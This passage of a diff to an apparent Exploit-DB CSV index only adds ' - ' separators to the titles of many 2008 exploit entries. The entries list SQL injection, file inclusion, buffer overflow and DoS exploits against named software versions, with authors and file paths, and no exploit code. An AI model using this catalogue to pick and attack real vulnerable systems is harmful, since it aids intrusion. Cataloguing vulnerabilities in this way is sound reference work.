Inclusion",2008-07-15,RoMaNcYxHaCkEr,php,webapps,0 6077,platforms/windows/dos/6077.c,"WinRemotePC Full+Lite 2008 r.2server Denial of Service Exploit",2008-07-15,Shinnok,windows,dos,0 -6078,platforms/php/webapps/6078.txt,"Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion",2008-07-15,N3TR00T3R,php,webapps,0 -6079,platforms/php/webapps/6079.txt,"Comdev Web Blogger <= 4.1.3 (arcmonth) SQL Injection",2008-07-15,K-159,php,webapps,0 -6080,platforms/php/webapps/6080.txt,"php Help Agent <= 1.1 (content) Local File Inclusion",2008-07-15,BeyazKurt,php,webapps,0 +6078,platforms/php/webapps/6078.txt,"Pragyan CMS 2.6.2 - (sourceFolder) Remote File Inclusion",2008-07-15,N3TR00T3R,php,webapps,0 +6079,platforms/php/webapps/6079.txt,"Comdev Web Blogger <= 4.1.3 - (arcmonth) SQL Injection",2008-07-15,K-159,php,webapps,0 +6080,platforms/php/webapps/6080.txt,"php Help Agent <= 1.1 - (content) Local File Inclusion",2008-07-15,BeyazKurt,php,webapps,0 6081,platforms/php/webapps/6081.txt,"Galatolo Web Manager 1.3a Insecure Cookie Handling",2008-07-15,"Virangar Security",php,webapps,0 6082,platforms/php/webapps/6082.txt,"PhotoPost vBGallery 2.4.2 - Arbitrary File Upload",2008-07-15,"Cold Zero",php,webapps,0 6083,platforms/windows/dos/6083.html,"Document Imaging SDK 10.95 - ActiveX Buffer Overflow PoC",2008-07-15,r0ut3r,windows,dos,0 @@ -5706,28 +5706,28 @@ id,file,description,date,author,platform,type,port 6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution and Denial of Service Exploit",2008-07-17,kingcope,windows,remote,80 6090,platforms/windows/dos/6090.html,"PPMate PPMedia Class ActiveX Control Buffer Overflow PoC",2008-07-17,"Guido Landi",windows,dos,0 6091,platforms/php/webapps/6091.txt,"phpHoo3 <= 5.2.6 - (phpHoo3.php viewCat) SQL Injection",2008-07-17,Mr.SQL,php,webapps,0 -6092,platforms/php/webapps/6092.txt,"AlstraSoft Video Share Enterprise 4.5.1 (UID) SQL Injection",2008-07-17,"Hussin X",php,webapps,0 +6092,platforms/php/webapps/6092.txt,"AlstraSoft Video Share Enterprise 4.5.1 - (UID) SQL Injection",2008-07-17,"Hussin X",php,webapps,0 6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - Remote SELinux Privilege Elevation Exploit (Auth)",2008-07-17,eliteboy,linux,remote,0 6095,platforms/php/webapps/6095.pl,"AlstraSoft Article Manager Pro 1.6 - Blind SQL Injection Exploit",2008-07-17,GoLd_M,php,webapps,0 6096,platforms/php/webapps/6096.txt,"preCMS 1 - (index.php page) Remote SQL Injection",2008-07-17,Mr.SQL,php,webapps,0 -6097,platforms/php/webapps/6097.txt,"Artic Issue Tracker 2.0.0 (index.php filter) SQL Injection",2008-07-17,QTRinux,php,webapps,0 -6098,platforms/php/webapps/6098.txt,"Aprox CMS Engine 5.1.0.4 (index.php page) SQL Injection",2008-07-18,Mr.SQL,php,webapps,0 +6097,platforms/php/webapps/6097.txt,"Artic Issue Tracker 2.0.0 - (index.php filter) SQL Injection",2008-07-17,QTRinux,php,webapps,0 +6098,platforms/php/webapps/6098.txt,"Aprox CMS Engine 5.1.0.4 - (index.php page) SQL Injection",2008-07-18,Mr.SQL,php,webapps,0 6099,platforms/php/webapps/6099.txt,"Siteframe (folder.php id) Remote SQL Injection",2008-07-18,n0ne,php,webapps,0 6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 - Remote Buffer Overflow Exploit (Win32)",2008-07-18,Unohope,windows,remote,80 6101,platforms/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Remote Preauth DoS Exploit",2008-07-19,"Joxean Koret",multiple,dos,0 -6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 (show.php) Remote SQL Injection",2008-07-20,Mr.SQL,php,webapps,0 +6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 - (show.php) Remote SQL Injection",2008-07-20,Mr.SQL,php,webapps,0 6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow PoC",2008-07-21,"Guido Landi",windows,dos,0 -6104,platforms/asp/webapps/6104.pl,"DigiLeave 1.2 (info_book.asp book_id) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,asp,webapps,0 +6104,platforms/asp/webapps/6104.pl,"DigiLeave 1.2 - (info_book.asp book_id) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,asp,webapps,0 6105,platforms/asp/webapps/6105.pl,"HRS Multi (picture_pic_bv.asp key) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,asp,webapps,0 6106,platforms/windows/local/6106.pl,"IntelliTamper 2.07 - (map file) Local Arbitrary Code Execution Exploit (Perl)",2008-07-21,"Guido Landi",windows,local,0 -6107,platforms/php/webapps/6107.txt,"Interact E-Learning System 2.4.1 (help.php) LFI Vulnerabilities",2008-07-21,DSecRG,php,webapps,0 +6107,platforms/php/webapps/6107.txt,"Interact E-Learning System 2.4.1 - (help.php) LFI Vulnerabilities",2008-07-21,DSecRG,php,webapps,0 6108,platforms/cgi/webapps/6108.pl,"MojoClassifieds 2.0 - Remote Blind SQL Injection Exploit",2008-07-21,Mr.SQL,cgi,webapps,0 6109,platforms/cgi/webapps/6109.pl,"MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,cgi,webapps,0 6110,platforms/cgi/webapps/6110.pl,"MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,cgi,webapps,0 6111,platforms/cgi/webapps/6111.pl,"MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,cgi,webapps,0 6112,platforms/php/webapps/6112.txt,"EZWebAlbum (dlfilename) Remote File Disclosure",2008-07-21,"Ghost Hacker",php,webapps,0 -6113,platforms/php/webapps/6113.pl,"Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit",2008-07-21,ldma,php,webapps,0 -6114,platforms/php/webapps/6114.txt,"ShopCartDx 4.30 (pid) Remote SQL Injection",2008-07-21,Cr@zy_King,php,webapps,0 +6113,platforms/php/webapps/6113.pl,"Arctic Issue Tracker 2.0.0 - (index.php filter) SQL Injection Exploit",2008-07-21,ldma,php,webapps,0 +6114,platforms/php/webapps/6114.txt,"ShopCartDx 4.30 - (pid) Remote SQL Injection",2008-07-21,Cr@zy_King,php,webapps,0 6115,platforms/php/webapps/6115.txt,"EZWebAlbum Insecure Cookie Handling",2008-07-21,"Virangar Security",php,webapps,0 6116,platforms/windows/remote/6116.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow Exploit (Perl)",2008-07-22,"Guido Landi",windows,remote,0 6117,platforms/php/webapps/6117.txt,"youtube blog 0.1 - (RFI/SQLl/XSS) Multiple Vulnerabilities",2008-07-22,Unohope,php,webapps,0 @@ -5738,38 +5738,38 @@ id,file,description,date,author,platform,type,port 6122,platforms/multiple/remote/6122.rb,"BIND 9.4.1-9.4.2 - Remote DNS Cache Poisoning Flaw Exploit (Metasploit)",2008-07-23,I)ruid,multiple,remote,0 6123,platforms/multiple/remote/6123.py,"BIND 9.x - Remote DNS Cache Poisoning Flaw Exploit (Python)",2008-07-24,"Julien Desfossez",multiple,remote,0 6124,platforms/windows/remote/6124.c,"Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit",2008-07-24,callAX,windows,remote,0 -6125,platforms/php/webapps/6125.txt,"Atom PhotoBlog 1.1.5b1 (photoId) Remote SQL Injection",2008-07-24,Mr.SQL,php,webapps,0 -6126,platforms/php/webapps/6126.txt,"ibase <= 2.03 (download.php) Remote File Disclosure",2008-07-24,Dyshoo,php,webapps,0 +6125,platforms/php/webapps/6125.txt,"Atom PhotoBlog 1.1.5b1 - (photoId) Remote SQL Injection",2008-07-24,Mr.SQL,php,webapps,0 +6126,platforms/php/webapps/6126.txt,"ibase <= 2.03 - (download.php) Remote File Disclosure",2008-07-24,Dyshoo,php,webapps,0 6127,platforms/php/webapps/6127.htm,"WordPress Plugin Download Manager 0.2 - Arbitrary File Upload Exploit",2008-07-24,SaO,php,webapps,0 -6128,platforms/php/webapps/6128.txt,"Live Music Plus 1.1.0 (id) Remote SQL Injection",2008-07-24,IRAQI,php,webapps,0 +6128,platforms/php/webapps/6128.txt,"Live Music Plus 1.1.0 - (id) Remote SQL Injection",2008-07-24,IRAQI,php,webapps,0 6129,platforms/minix/dos/6129.txt,"minix 3.1.2a tty panic Remote Denial of Service",2008-07-25,kokanin,minix,dos,0 6130,platforms/multiple/remote/6130.c,"BIND 9.x - Remote DNS Cache Poisoning Flaw Exploit",2008-07-25,"Marc Bevand",multiple,remote,0 6131,platforms/php/webapps/6131.txt,"xrms 1.99.2 - (RFI/XSS/ig) Multiple Vulnerabilities",2008-07-25,AzzCoder,php,webapps,0 -6132,platforms/php/webapps/6132.txt,"Camera Life 2.6.2 (id) Remote SQL Injection",2008-07-25,nuclear,php,webapps,0 -6133,platforms/php/webapps/6133.txt,"FizzMedia 1.51.2 (comment.php mid) SQL Injection",2008-07-25,Mr.SQL,php,webapps,0 -6134,platforms/php/webapps/6134.txt,"phpTest 0.6.3 (picture.php image_id) Remote SQL Injection",2008-07-25,cOndemned,php,webapps,0 -6135,platforms/asp/webapps/6135.txt,"fipsCMS light <= 2.1 (r) Remote SQL Injection",2008-07-26,U238,asp,webapps,0 +6132,platforms/php/webapps/6132.txt,"Camera Life 2.6.2 - (id) Remote SQL Injection",2008-07-25,nuclear,php,webapps,0 +6133,platforms/php/webapps/6133.txt,"FizzMedia 1.51.2 - (comment.php mid) SQL Injection",2008-07-25,Mr.SQL,php,webapps,0 +6134,platforms/php/webapps/6134.txt,"phpTest 0.6.3 - (picture.php image_id) Remote SQL Injection",2008-07-25,cOndemned,php,webapps,0 +6135,platforms/asp/webapps/6135.txt,"fipsCMS light <= 2.1 - (r) Remote SQL Injection",2008-07-26,U238,asp,webapps,0 6136,platforms/php/webapps/6136.txt,"phpWebNews 0.2 MySQL Edition - (SQL) Insecure Cookie Handling",2008-07-26,"Virangar Security",php,webapps,0 6137,platforms/php/webapps/6137.txt,"IceBB <= 1.0-RC9.2 - BlindSQL Injection / Session Hijacking Exploit",2008-07-26,girex,php,webapps,0 -6138,platforms/php/webapps/6138.txt,"Mobius <= 1.4.4.1 (browse.php id) Remote SQL Injection",2008-07-26,dun,php,webapps,0 -6139,platforms/php/webapps/6139.txt,"EPShop < 3.0 (pid) Remote SQL Injection",2008-07-26,mikeX,php,webapps,0 +6138,platforms/php/webapps/6138.txt,"Mobius <= 1.4.4.1 - (browse.php id) Remote SQL Injection",2008-07-26,dun,php,webapps,0 +6139,platforms/php/webapps/6139.txt,"EPShop < 3.0 - (pid) Remote SQL Injection",2008-07-26,mikeX,php,webapps,0 6140,platforms/php/webapps/6140.txt,"phpLinkat 0.1 Insecure Cookie Handling / SQL Injection",2008-07-26,"Encrypt3d.M!nd ",php,webapps,0 -6141,platforms/php/webapps/6141.txt,"TriO <= 2.1 (browse.php id) Remote SQL Injection",2008-07-26,dun,php,webapps,0 -6142,platforms/php/webapps/6142.txt,"CMScout 2.05 (common.php bit) Local File Inclusion",2008-07-27,"Khashayar Fereidani",php,webapps,0 +6141,platforms/php/webapps/6141.txt,"TriO <= 2.1 - (browse.php id) Remote SQL Injection",2008-07-26,dun,php,webapps,0 +6142,platforms/php/webapps/6142.txt,"CMScout 2.05 - (common.php bit) Local File Inclusion",2008-07-27,"Khashayar Fereidani",php,webapps,0 6143,platforms/php/webapps/6143.txt,"Getacoder clone (sb_protype) Remote SQL Injection",2008-07-27,"Hussin X",php,webapps,0 6144,platforms/php/webapps/6144.txt,"GC Auction Platinum (cate_id) Remote SQL Injection",2008-07-27,"Hussin X",php,webapps,0 6145,platforms/php/webapps/6145.txt,"SiteAdmin CMS (art) Remote SQL Injection",2008-07-27,Cr@zy_King,php,webapps,0 -6146,platforms/php/webapps/6146.txt,"Pligg CMS 9.9.0 (story.php id) Remote SQL Injection",2008-07-28,"Hussin X",php,webapps,0 +6146,platforms/php/webapps/6146.txt,"Pligg CMS 9.9.0 - (story.php id) Remote SQL Injection",2008-07-28,"Hussin X",php,webapps,0 6147,platforms/php/webapps/6147.txt,"Youtuber Clone (ugroups.php UID) Remote SQL Injection",2008-07-28,"Hussin X",php,webapps,0 -6148,platforms/php/webapps/6148.txt,"TalkBack 2.3.5 (language) Local File Inclusion",2008-07-28,NoGe,php,webapps,0 +6148,platforms/php/webapps/6148.txt,"TalkBack 2.3.5 - (language) Local File Inclusion",2008-07-28,NoGe,php,webapps,0 6149,platforms/php/webapps/6149.txt,"Dokeos E-Learning System 1.8.5 - Local File Inclusion",2008-07-28,DSecRG,php,webapps,0 -6150,platforms/php/webapps/6150.txt,"PixelPost 1.7.1 (language_full) Local File Inclusion",2008-07-28,DSecRG,php,webapps,0 +6150,platforms/php/webapps/6150.txt,"PixelPost 1.7.1 - (language_full) Local File Inclusion",2008-07-28,DSecRG,php,webapps,0 6151,platforms/windows/remote/6151.txt,"velocity web-server 1.0 - Directory Traversal file download",2008-07-28,DSecRG,windows,remote,0 6152,platforms/windows/remote/6152.html,"Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BoF Exploit",2008-07-28,Elazar,windows,remote,0 -6153,platforms/php/webapps/6153.txt,"ATutor <= 1.6.1-pl1 (import.php) Remote File Inclusion",2008-07-28,"Khashayar Fereidani",php,webapps,0 -6154,platforms/php/webapps/6154.txt,"ViArt Shop <= 3.5 (category_id) Remote SQL Injection",2008-07-28,"GulfTech Security",php,webapps,0 +6153,platforms/php/webapps/6153.txt,"ATutor <= 1.6.1-pl1 - (import.php) Remote File Inclusion",2008-07-28,"Khashayar Fereidani",php,webapps,0 +6154,platforms/php/webapps/6154.txt,"ViArt Shop <= 3.5 - (category_id) Remote SQL Injection",2008-07-28,"GulfTech Security",php,webapps,0 6155,platforms/hardware/remote/6155.c,"Cisco IOS 12.3(18) FTP Server - Remote Exploit (attached to gdb)",2008-07-29,"Andy Davis",hardware,remote,0 -6156,platforms/php/webapps/6156.txt,"Minishowcase 09b136 (lang) Local File Inclusion",2008-07-29,DSecRG,php,webapps,0 +6156,platforms/php/webapps/6156.txt,"Minishowcase 09b136 - (lang) Local File Inclusion",2008-07-29,DSecRG,php,webapps,0 6157,platforms/windows/local/6157.pl,"CoolPlayer - m3u File Local Buffer Overflow Exploit",2008-07-29,"Guido Landi",windows,local,0 6158,platforms/php/webapps/6158.pl,"e107 Plugin BLOG Engine 2.2 - Blind SQL Injection Exploit",2008-07-29,"Virangar Security",php,webapps,0 6159,platforms/php/webapps/6159.txt,"Gregarius <= 0.5.4 - rsargs[] Remote SQL Injection",2008-07-29,"GulfTech Security",php,webapps,0 @@ -5777,87 +5777,87 @@ id,file,description,date,author,platform,type,port 6161,platforms/php/webapps/6161.txt,"HIOX Random Ad 1.3 - (hioxRandomAd.php hm) RFI",2008-07-30,"Ghost Hacker",php,webapps,0 6162,platforms/php/webapps/6162.txt,"hiox browser statistics 2.0 - Remote File Inclusion",2008-07-30,"Ghost Hacker",php,webapps,0 6163,platforms/php/webapps/6163.txt,"PHP Hosting Directory 2.0 Insecure Cookie Handling",2008-07-30,Stack,php,webapps,0 -6164,platforms/php/webapps/6164.txt,"nzFotolog 0.4.1 (action_file) Local File Inclusion",2008-07-30,"Khashayar Fereidani",php,webapps,0 +6164,platforms/php/webapps/6164.txt,"nzFotolog 0.4.1 - (action_file) Local File Inclusion",2008-07-30,"Khashayar Fereidani",php,webapps,0 6165,platforms/php/webapps/6165.txt,"ZeeReviews (comments.php ItemID) Remote SQL Injection",2008-07-30,Mr.SQL,php,webapps,0 6166,platforms/php/webapps/6166.php,"HIOX Random Ad 1.3 - Arbitrary Add Admin User Exploit",2008-07-30,Stack,php,webapps,0 6167,platforms/php/webapps/6167.txt,"Article Friendly Pro/Standard (Cat) Remote SQL Injection",2008-07-30,Mr.SQL,php,webapps,0 6168,platforms/php/webapps/6168.php,"HIOX Browser Statistics 2.0 - Arbitrary Add Admin User Exploit",2008-07-30,Stack,php,webapps,0 6169,platforms/php/webapps/6169.txt,"PozScripts Classified Ads Script (cid) SQL Injection",2008-07-30,"Hussin X",php,webapps,0 6170,platforms/php/webapps/6170.txt,"TubeGuru Video Sharing Script (UID) SQL Injection",2008-07-30,"Hussin X",php,webapps,0 -6171,platforms/php/webapps/6171.pl,"eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit",2008-07-30,Jack,php,webapps,0 +6171,platforms/php/webapps/6171.pl,"eNdonesia 8.4 - (Calendar Module) Remote SQL Injection Exploit",2008-07-30,Jack,php,webapps,0 6172,platforms/php/webapps/6172.pl,"Pligg <= 9.9.0 - Remote Code Execution Exploit",2008-07-30,"GulfTech Security",php,webapps,0 6173,platforms/php/webapps/6173.txt,"pligg <= 9.9.0 - (XSS/LFI/SQL) Multiple Vulnerabilities",2008-07-30,"GulfTech Security",php,webapps,0 6174,platforms/multiple/dos/6174.txt,"F-PROT antivirus 6.2.1.4252 - (malformed archive) Infinite Loop DoS Exploit",2008-07-31,kokanin,multiple,dos,0 6175,platforms/windows/remote/6175.html,"NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit",2008-07-31,shinnai,windows,remote,0 6176,platforms/php/webapps/6176.txt,"PHPX 3.5.16 Cookie Poisoning and Login Bypass",2008-07-31,gnix,php,webapps,0 -6177,platforms/php/webapps/6177.php,"Symphony <= 1.7.01 (non-patched) Remote Code Execution Exploit",2008-07-31,Raz0r,php,webapps,0 +6177,platforms/php/webapps/6177.php,"Symphony <= 1.7.01 - (non-patched) Remote Code Execution Exploit",2008-07-31,Raz0r,php,webapps,0 6178,platforms/php/webapps/6178.php,"Coppermine Photo Gallery <= 1.4.18 - LFI / Remote Code Execution Exploit",2008-07-31,EgiX,php,webapps,0 -6179,platforms/php/webapps/6179.txt,"LetterIt 2 (language) Local File Inclusion",2008-07-31,NoGe,php,webapps,0 +6179,platforms/php/webapps/6179.txt,"LetterIt 2 - (language) Local File Inclusion",2008-07-31,NoGe,php,webapps,0 6180,platforms/php/webapps/6180.txt,"phpMyRealty (location) Remote SQL Injection",2008-08-01,CraCkEr,php,webapps,0 6181,platforms/windows/dos/6181.php,"RealVNC Windows Client 4.1.2 - Remote DoS Crash PoC",2008-08-01,beford,windows,dos,0 -6182,platforms/php/webapps/6182.txt,"PHPAuction GPL Enhanced 2.51 (profile.php) SQL Injection",2008-08-01,"Hussin X",php,webapps,0 +6182,platforms/php/webapps/6182.txt,"PHPAuction GPL Enhanced 2.51 - (profile.php) SQL Injection",2008-08-01,"Hussin X",php,webapps,0 6183,platforms/php/webapps/6183.txt,"ABG Blocking Script 1.0a (abg_path) Remote File Inclusion",2008-08-01,Lo$er,php,webapps,0 6184,platforms/php/webapps/6184.txt,"E-topbiz Dating 3 PHP Script (mail_id) Remote SQL Injection",2008-08-01,Corwin,php,webapps,0 -6185,platforms/php/webapps/6185.txt,"Scripts24 iTGP 1.0.4 (id) Remote SQL Injection",2008-08-01,Mr.SQL,php,webapps,0 -6186,platforms/php/webapps/6186.txt,"Scripts24 iPost 1.0.1 (id) Remote SQL Injection",2008-08-01,Mr.SQL,php,webapps,0 -6187,platforms/php/webapps/6187.txt,"eStoreAff 0.1 (cid) Remote SQL Injection",2008-08-01,Mr.SQL,php,webapps,0 +6185,platforms/php/webapps/6185.txt,"Scripts24 iTGP 1.0.4 - (id) Remote SQL Injection",2008-08-01,Mr.SQL,php,webapps,0 +6186,platforms/php/webapps/6186.txt,"Scripts24 iPost 1.0.1 - (id) Remote SQL Injection",2008-08-01,Mr.SQL,php,webapps,0 +6187,platforms/php/webapps/6187.txt,"eStoreAff 0.1 - (cid) Remote SQL Injection",2008-08-01,Mr.SQL,php,webapps,0 6188,platforms/windows/local/6188.c,"IrfanView <= 3.99 - IFF File Local Stack Buffer Overflow Exploit",2008-08-01,"fl0 fl0w",windows,local,0 6189,platforms/php/webapps/6189.txt,"GreenCart PHP Shopping Cart (id) Remote SQL Injection",2008-08-01,"Hussin X",php,webapps,0 6190,platforms/php/webapps/6190.txt,"phsBlog 0.1.1 - Multiple Remote SQL Injection Vulnerabilities",2008-08-01,cOndemned,php,webapps,0 6191,platforms/php/webapps/6191.txt,"e-vision CMS <= 2.02 - (SQL/upload/ig) Multiple Vulnerabilities",2008-08-02,"Khashayar Fereidani",php,webapps,0 6192,platforms/php/webapps/6192.txt,"k-links directory - (SQL/XSS) Multiple Vulnerabilities",2008-08-02,Corwin,php,webapps,0 6193,platforms/php/webapps/6193.txt,"E-Store Kit- <= 2 PayPal Edition - (pid) SQL Injection",2008-08-02,Mr.SQL,php,webapps,0 -6194,platforms/php/webapps/6194.pl,"moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit",2008-08-02,Ams,php,webapps,0 +6194,platforms/php/webapps/6194.pl,"moziloCMS 1.10.1 - (download.php) Arbitrary Download File Exploit",2008-08-02,Ams,php,webapps,0 6195,platforms/windows/remote/6195.c,"IntelliTamper 2.07 - (imgsrc) Remote Buffer Overflow Exploit",2008-08-03,r0ut3r,windows,remote,0 -6196,platforms/hardware/dos/6196.pl,"Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit",2008-08-03,crit3rion,hardware,dos,0 +6196,platforms/hardware/dos/6196.pl,"Xerox Phaser 8400 - (reboot) Remote Denial of Service Exploit",2008-08-03,crit3rion,hardware,dos,0 6199,platforms/php/webapps/6199.pl,"Joomla Component EZ Store Remote Blind SQL Injection Exploit",2008-08-03,His0k4,php,webapps,0 -6200,platforms/php/webapps/6200.txt,"syzygyCMS 0.3 (index.php page) Local File Inclusion",2008-08-03,SirGod,php,webapps,0 -6201,platforms/windows/dos/6201.html,"HydraIrc <= 0.3.164 (last) Remote Denial of Service Exploit",2008-08-04,securfrog,windows,dos,0 +6200,platforms/php/webapps/6200.txt,"syzygyCMS 0.3 - (index.php page) Local File Inclusion",2008-08-03,SirGod,php,webapps,0 +6201,platforms/windows/dos/6201.html,"HydraIrc <= 0.3.164 - (last) Remote Denial of Service Exploit",2008-08-04,securfrog,windows,dos,0 6203,platforms/php/webapps/6203.txt,"Dayfox Blog 4 - Multiple Local File Inclusion Vulnerabilities",2008-08-04,"Virangar Security",php,webapps,0 6204,platforms/php/webapps/6204.txt,"Plogger <= 3.0 - Remote SQL Injection",2008-08-05,"GulfTech Security",php,webapps,0 6205,platforms/php/webapps/6205.txt,"iges CMS <= 2.0 - (XSS/SQL) Multiple Vulnerabilities",2008-08-05,BugReport.IR,php,webapps,0 6206,platforms/php/webapps/6206.txt,"LiteNews <= 0.1 Insecure Cookie Handling",2008-08-05,Scary-Boys,php,webapps,0 -6207,platforms/php/webapps/6207.txt,"LiteNews <= 0.1 (id) Remote SQL Injection",2008-08-05,Stack,php,webapps,0 +6207,platforms/php/webapps/6207.txt,"LiteNews <= 0.1 - (id) Remote SQL Injection",2008-08-05,Stack,php,webapps,0 6208,platforms/php/webapps/6208.txt,"Multiple Wsn Products - (LFI) Code Execution",2008-08-06,otmorozok428,php,webapps,0 6209,platforms/php/webapps/6209.rb,"LoveCMS 1.6.2 Final - Remote Code Execution Exploit",2008-08-06,PoMdaPiMp,php,webapps,0 6210,platforms/php/webapps/6210.rb,"LoveCMS 1.6.2 Final - Update Settings Remote Exploit",2008-08-06,PoMdaPiMp,php,webapps,0 6211,platforms/php/webapps/6211.txt,"quate CMS 0.3.4 - (LFI/XSS) Multiple Vulnerabilities",2008-08-06,CraCkEr,php,webapps,0 6213,platforms/php/webapps/6213.txt,"Free Hosting Manager 1.2/2.0 Insecure Cookie Handling",2008-08-06,Scary-Boys,php,webapps,0 -6214,platforms/php/webapps/6214.php,"Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit",2008-08-06,james,php,webapps,0 +6214,platforms/php/webapps/6214.php,"Discuz! 6.0.1 - (searchid) Remote SQL Injection Exploit",2008-08-06,james,php,webapps,0 6215,platforms/php/webapps/6215.txt,"Ppim <= 1.0 - (Arbitrary File Delete/XSS) Multiple Vulnerabilities",2008-08-10,BeyazKurt,php,webapps,0 6216,platforms/windows/dos/6216.html,"Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC",2008-08-10,"Guido Landi",windows,dos,0 6217,platforms/windows/remote/6217.pl,"BlazeDVD 5.0 - PLF Playlist File Remote Buffer Overflow Exploit",2008-08-10,LiquidWorm,windows,remote,0 6218,platforms/multiple/dos/6218.txt,"Sun xVM VirtualBox < 1.6.4 - Privilege Escalation PoC",2008-08-10,"Core Security",multiple,dos,0 6219,platforms/php/webapps/6219.txt,"e107 <= 0.7.11 - Arbitrary Variable Overwriting",2008-08-10,"GulfTech Security",php,webapps,0 6220,platforms/windows/remote/6220.html,"Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BoF Exploit",2008-08-10,"Guido Landi",windows,remote,0 -6221,platforms/php/webapps/6221.txt,"Vacation Rental Script 3.0 (id) Remote SQL Injection",2008-08-10,CraCkEr,php,webapps,0 +6221,platforms/php/webapps/6221.txt,"Vacation Rental Script 3.0 - (id) Remote SQL Injection",2008-08-10,CraCkEr,php,webapps,0 6223,platforms/php/webapps/6223.php,"Quicksilver Forums 1.4.1 - forums[] Remote SQL Injection Exploit",2008-08-10,irk4z,php,webapps,0 6224,platforms/php/webapps/6224.txt,"txtSQL 2.2 Final (startup.php) Remote File Inclusion",2008-08-10,CraCkEr,php,webapps,0 6225,platforms/php/webapps/6225.txt,"PHP-Ring Webring System 0.9.1 Insecure Cookie Handling",2008-08-10,"Virangar Security",php,webapps,0 6226,platforms/php/webapps/6226.txt,"psipuss 1.0 - Multiple Remote SQL Injection Vulnerabilities",2008-08-10,"Virangar Security",php,webapps,0 6227,platforms/windows/remote/6227.c,"IntelliTamper 2.07 - HTTP Header Remote Code Execution Exploit",2008-08-10,"Wojciech Pawlikowski",windows,remote,0 -6228,platforms/php/webapps/6228.txt,"OpenImpro 1.1 (image.php id) SQL Injection",2008-08-10,nuclear,php,webapps,0 +6228,platforms/php/webapps/6228.txt,"OpenImpro 1.1 - (image.php id) SQL Injection",2008-08-10,nuclear,php,webapps,0 6229,platforms/multiple/remote/6229.txt,"apache tomcat < 6.0.18 utf8 - Directory Traversal",2008-08-11,"Simon Ryeo",multiple,remote,0 -6230,platforms/php/webapps/6230.txt,"ZeeBuddy 2.1 (bannerclick.php adid) SQL Injection",2008-08-11,"Hussin X",php,webapps,0 +6230,platforms/php/webapps/6230.txt,"ZeeBuddy 2.1 - (bannerclick.php adid) SQL Injection",2008-08-11,"Hussin X",php,webapps,0 6231,platforms/php/webapps/6231.txt,"Ppim <= 1.0 - (upload/change password) Multiple Vulnerabilities",2008-08-11,Stack,php,webapps,0 -6232,platforms/php/webapps/6232.txt,"Ovidentia 6.6.5 (item) Remote SQL Injection",2008-08-11,"Khashayar Fereidani",php,webapps,0 -6233,platforms/php/webapps/6233.txt,"BBlog 0.7.6 (mod) Remote SQL Injection",2008-08-12,IP-Sh0k,php,webapps,0 +6232,platforms/php/webapps/6232.txt,"Ovidentia 6.6.5 - (item) Remote SQL Injection",2008-08-11,"Khashayar Fereidani",php,webapps,0 +6233,platforms/php/webapps/6233.txt,"BBlog 0.7.6 - (mod) Remote SQL Injection",2008-08-12,IP-Sh0k,php,webapps,0 6234,platforms/php/webapps/6234.txt,"Joomla 1.5.x - (Token) Remote Admin Change Password",2008-08-12,d3m0n,php,webapps,0 -6235,platforms/php/webapps/6235.txt,"gelato CMS 0.95 (img) Remote File Disclosure",2008-08-13,JIKO,php,webapps,0 +6235,platforms/php/webapps/6235.txt,"gelato CMS 0.95 - (img) Remote File Disclosure",2008-08-13,JIKO,php,webapps,0 6236,platforms/multiple/remote/6236.txt,"BIND 9.5.0-P2 - (randomized ports) Remote DNS Cache Poisoning Exploit",2008-08-13,Zbr,multiple,remote,0 6237,platforms/multiple/dos/6237.txt,"Ventrilo <= 3.0.2 - NULL pointer Remote DoS Exploit",2008-08-13,"Luigi Auriemma",multiple,dos,0 6238,platforms/windows/remote/6238.c,"IntelliTamper 2.07/2.08 Beta 4 - A HREF Remote Buffer Overflow Exploit",2008-08-13,kralor,windows,remote,0 -6239,platforms/multiple/dos/6239.txt,"Ruby <= 1.9 (regex engine) Remote Socket Memory Leak Exploit",2008-08-13,"laurent gaffié ",multiple,dos,0 +6239,platforms/multiple/dos/6239.txt,"Ruby <= 1.9 - (regex engine) Remote Socket Memory Leak Exploit",2008-08-13,"laurent gaffié ",multiple,dos,0 6240,platforms/windows/dos/6240.py,"FlashGet 1.9 - (FTP PWD Response) Remote BoF Exploit PoC (0Day)",2008-08-13,h07,windows,dos,0 6244,platforms/windows/dos/6244.js,"Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BoF PoC",2008-08-14,Symantec,windows,dos,0 -6247,platforms/php/webapps/6247.txt,"dotCMS 1.6 (id) Multiple Local File Inclusion Vulnerabilities",2008-08-15,Don,php,webapps,0 +6247,platforms/php/webapps/6247.txt,"dotCMS 1.6 - (id) Multiple Local File Inclusion Vulnerabilities",2008-08-15,Don,php,webapps,0 6248,platforms/windows/remote/6248.pl,"FlashGet 1.9.0.1012 - (FTP PWD Response) SEH STACK Overflow Exploit",2008-08-15,SkOd,windows,remote,21 -6249,platforms/php/webapps/6249.txt,"ZEEJOBSITE 2.0 (adid) Remote SQL Injection",2008-08-15,"Hussin X",php,webapps,0 +6249,platforms/php/webapps/6249.txt,"ZEEJOBSITE 2.0 - (adid) Remote SQL Injection",2008-08-15,"Hussin 